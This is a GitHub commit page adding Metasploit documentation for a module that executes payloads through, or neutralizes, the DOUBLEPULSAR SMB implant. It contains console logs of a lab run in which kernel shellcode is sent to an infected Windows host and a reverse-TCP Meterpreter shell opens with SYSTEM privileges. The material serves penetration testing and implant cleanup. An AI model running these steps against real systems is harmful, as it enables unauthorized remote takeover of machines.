Skip to content

Commit

Permalink
Land #12374, Add DOUBLEPULSAR payload execution and neutralization mo…
Browse files Browse the repository at this point in the history 
…dule
  • Loading branch information
@busterb
busterb committed Oct 1, 2019
2 parents b223e5e + a1d1303 commit f3c8037
Show file tree
Hide file tree
Showing 2 changed files with 478 additions and 0 deletions.
94 changes: 94 additions & 0 deletions documentation/modules/exploit/windows/smb/doublepulsar_rce.md
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,94 @@
## Introduction

This module executes a Metasploit payload against the Equation Group's
DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.

While this module primarily performs code execution against the implant,
the `Neutralize implant` target allows you to disable the implant.

## Targets

```
Id Name
-- ----
0 Execute payload
1 Neutralize implant
```

## Options

**DefangedMode**

Set this to `false` to disable defanged mode and enable module
functionality. Set this only if you're SURE you want to proceed.

**ProcessName**

Set this to the userland process you want to inject the payload into.
Defaults to `spoolsv.exe`.

## Usage

Pinging the implant:

```
msf5 exploit(windows/smb/doublepulsar_rce) > check
[+] 192.168.56.115:445 - Connected to \\192.168.56.115\IPC$ with TID = 2048
[*] 192.168.56.115:445 - Target OS is Windows Server 2008 R2 Standard 7601 Service Pack 1
[*] 192.168.56.115:445 - Sending ping to DOUBLEPULSAR
[+] 192.168.56.115:445 - Host is likely INFECTED with DoublePulsar! - Arch: x64 (64-bit), XOR Key: 0x33C6DC64
[+] 192.168.56.115:445 - The target is vulnerable.
msf5 exploit(windows/smb/doublepulsar_rce) >
```

Executing a payload:

```
msf5 exploit(windows/smb/doublepulsar_rce) > set target Execute\ payload
target => Execute payload
msf5 exploit(windows/smb/doublepulsar_rce) > run
[*] Started reverse TCP handler on 192.168.56.1:4444
[+] 192.168.56.115:445 - Connected to \\192.168.56.115\IPC$ with TID = 2048
[*] 192.168.56.115:445 - Target OS is Windows Server 2008 R2 Standard 7601 Service Pack 1
[*] 192.168.56.115:445 - Sending ping to DOUBLEPULSAR
[+] 192.168.56.115:445 - Host is likely INFECTED with DoublePulsar! - Arch: x64 (64-bit), XOR Key: 0x33C6DC64
[*] 192.168.56.115:445 - Generating kernel shellcode with windows/x64/meterpreter/reverse_tcp
[*] 192.168.56.115:445 - Total shellcode length: 4096 bytes
[*] 192.168.56.115:445 - Encrypting shellcode with XOR key 0x33C6DC64
[*] 192.168.56.115:445 - Sending shellcode to DOUBLEPULSAR
[+] 192.168.56.115:445 - Payload execution successful
[*] Sending stage (206403 bytes) to 192.168.56.115
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.115:49158) at 2019-09-25 18:26:47 -0500
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer : WIN-S7TDBIENPVM
OS : Windows 2008 R2 (6.1 Build 7601, Service Pack 1).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x64/windows
meterpreter >
```

Neutralizing the implant:

```
msf5 exploit(windows/smb/doublepulsar_rce) > set target Neutralize\ implant
target => Neutralize implant
msf5 exploit(windows/smb/doublepulsar_rce) > run
[*] Started reverse TCP handler on 192.168.56.1:4444
[+] 192.168.56.115:445 - Connected to \\192.168.56.115\IPC$ with TID = 2048
[*] 192.168.56.115:445 - Target OS is Windows Server 2008 R2 Standard 7601 Service Pack 1
[*] 192.168.56.115:445 - Sending ping to DOUBLEPULSAR
[+] 192.168.56.115:445 - Host is likely INFECTED with DoublePulsar! - Arch: x64 (64-bit), XOR Key: 0x33C6DC64
[*] 192.168.56.115:445 - Neutralizing DOUBLEPULSAR
[+] 192.168.56.115:445 - Implant neutralization successful
[*] Exploit completed, but no session was created.
msf5 exploit(windows/smb/doublepulsar_rce) >
```
Loading

0 comments on commit f3c8037

Please sign in to comment.